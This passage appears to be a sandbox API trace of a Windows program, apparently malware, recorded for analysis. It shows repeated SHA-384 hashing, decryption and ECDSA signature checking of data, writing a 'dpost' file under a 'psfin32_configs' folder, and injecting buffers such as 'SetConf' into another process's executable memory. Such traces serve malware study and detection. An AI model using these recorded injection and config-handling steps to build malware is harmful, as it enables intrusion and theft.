	[0226.184] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c338, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c338, pdwDataLen=0x1284a8) returned 1
	[0226.184] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.184] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.184] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.184] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.184] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0226.184] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.184] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c360, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c360, pdwDataLen=0x1284a8) returned 1
	[0226.185] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.185] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.185] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.230] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.230] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0226.230] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.230] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c388, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c388, pdwDataLen=0x1284a8) returned 1
	[0226.230] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.230] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.230] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.231] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.231] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0226.231] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.231] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c3b0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c3b0, pdwDataLen=0x1284a8) returned 1
	[0226.231] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.231] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.231] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.231] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.231] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0226.231] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.231] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c3d8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c3d8, pdwDataLen=0x1284a8) returned 1
	[0226.231] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.231] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.231] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.232] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.232] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0226.232] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.232] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c400, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c400, pdwDataLen=0x1284a8) returned 1
	[0226.232] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.232] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.232] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.232] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.232] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0226.232] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.232] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c428, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c428, pdwDataLen=0x1284a8) returned 1
	[0226.232] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.232] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.232] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.233] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.233] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0226.233] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.233] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c450, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c450, pdwDataLen=0x1284a8) returned 1
	[0226.233] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.233] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.233] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.233] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.233] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0226.233] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.234] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c478, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c478, pdwDataLen=0x1284a8) returned 1
	[0226.234] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.234] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.234] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.234] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.234] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0226.234] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.234] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c4a0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c4a0, pdwDataLen=0x1284a8) returned 1
	[0226.234] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.234] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.234] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.234] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.234] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0226.235] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.235] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c4c8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c4c8, pdwDataLen=0x1284a8) returned 1
	[0226.235] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.235] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.235] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.235] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.235] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0226.235] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.235] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c4f0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c4f0, pdwDataLen=0x1284a8) returned 1
	[0226.235] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.235] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.235] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.236] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.236] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0226.236] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.236] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c518, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c518, pdwDataLen=0x1284a8) returned 1
	[0226.236] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.236] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.236] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.236] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.236] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0226.236] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.236] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c540, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c540, pdwDataLen=0x1284a8) returned 1
	[0226.236] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.237] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.237] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.237] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.237] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0226.237] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.237] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c568, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c568, pdwDataLen=0x1284a8) returned 1
	[0226.237] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.237] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.237] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.237] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.237] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0226.238] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.238] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c590, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c590, pdwDataLen=0x1284a8) returned 1
	[0226.238] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.238] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.238] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.238] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.238] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0226.238] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.238] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c5b8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c5b8, pdwDataLen=0x1284a8) returned 1
	[0226.238] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.238] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.238] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.239] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.239] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0226.239] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.239] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c5e0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c5e0, pdwDataLen=0x1284a8) returned 1
	[0226.239] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.239] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.239] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.239] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.239] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0226.239] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.239] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c608, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c608, pdwDataLen=0x1284a8) returned 1
	[0226.239] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.239] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.239] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.240] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.240] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0226.240] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.240] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c630, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c630, pdwDataLen=0x1284a8) returned 1
	[0226.240] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.240] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.240] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.240] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.240] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0226.240] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.240] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c658, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c658, pdwDataLen=0x1284a8) returned 1
	[0226.241] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.241] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.241] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.241] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.241] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0226.241] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.241] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231c680, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c680, pdwDataLen=0x1284a8) returned 1
	[0226.241] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.241] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.241] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.242] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.242] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0226.242] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.242] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231c6a8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231c6a8, pdwDataLen=0x1284a8) returned 1
	[0226.242] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.242] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.243] CryptImportKey (in: hProv=0x225c98, pbData=0x12849c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x1284dc | out: phKey=0x1284dc*=0x22b69c0) returned 1
	[0226.243] CryptSetKeyParam (hKey=0x22b69c0, dwParam=0x4, pbData=0x1284c8*=0x1, dwFlags=0x0) returned 1
	[0226.243] CryptSetKeyParam (hKey=0x22b69c0, dwParam=0x1, pbData=0x231c7c0, dwFlags=0x0) returned 1
	[0226.243] CryptDecrypt (in: hKey=0x22b69c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x22ba9c8, pdwDataLen=0x1284d0 | out: pbData=0x22ba9c8, pdwDataLen=0x1284d0) returned 1
	[0226.243] CryptDestroyKey (hKey=0x22b69c0) returned 1
	[0226.243] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.243] GetVersion () returned 0x1db10106
	[0226.243] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x1284dc, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x1284dc) returned 0x0
	[0226.244] BCryptImportKeyPair (in: hAlgorithm=0x22ee348, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x1284e4, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x1284e4) returned 0x0
	[0226.246] BCryptGetProperty (in: hObject=0x2299e30, pszProperty="SignatureLength", pbOutput=0x1284fc, cbOutput=0x4, pcbResult=0x1284d4, dwFlags=0x0 | out: pbOutput=0x1284fc, pcbResult=0x1284d4) returned 0x0
	[0226.246] BCryptVerifySignature (hKey=0x2299e30, pPaddingInfo=0x0, pbHash=0x22a6260, cbHash=0x30, pbSignature=0x22bacbb, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0226.250] BCryptDestroyKey (in: hKey=0x2299e30 | out: hKey=0x2299e30) returned 0x0
	[0226.250] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee348, dwFlags=0x0 | out: hAlgorithm=0x22ee348) returned 0x0
	[0226.250] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0226.250] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs")) returned 0xffffffff
	[0226.250] PathRemoveBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs") returned=""
	[0226.250] CreateDirectoryW (lpPathName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs"), lpSecurityAttributes=0x0) returned 1
	[0226.251] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\") returned=""
	[0226.251] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610
	[0226.252] WriteFile (in: hFile=0x610, lpBuffer=0x26b8780*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x12853c, lpOverlapped=0x0 | out: lpBuffer=0x26b8780*, lpNumberOfBytesWritten=0x12853c*=0x3a0, lpOverlapped=0x0) returned 1
	[0226.253] CloseHandle (hObject=0x610) returned 1
	[0226.254] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12854c | out: lpSystemTimeAsFileTime=0x12854c*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) 
	[0226.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetConf", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
	[0226.254] lstrlenA (lpString="SetConf") returned 7
	[0226.254] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0226.254] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffca8*, nSize=0x8, lpNumberOfBytesWritten=0x12802c | out: lpBuffer=0x22ffca8*, lpNumberOfBytesWritten=0x12802c*=0x8) returned 1
	[0226.255] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x2eb, flAllocationType=0x3000, flProtect=0x40) returned 0x140000
	[0226.255] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x140000, lpBuffer=0x231efe8*, nSize=0x2eb, lpNumberOfBytesWritten=0x12802c | out: lpBuffer=0x231efe8*, lpNumberOfBytesWritten=0x12802c*=0x2eb) returned 1
	[0226.255] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x150000
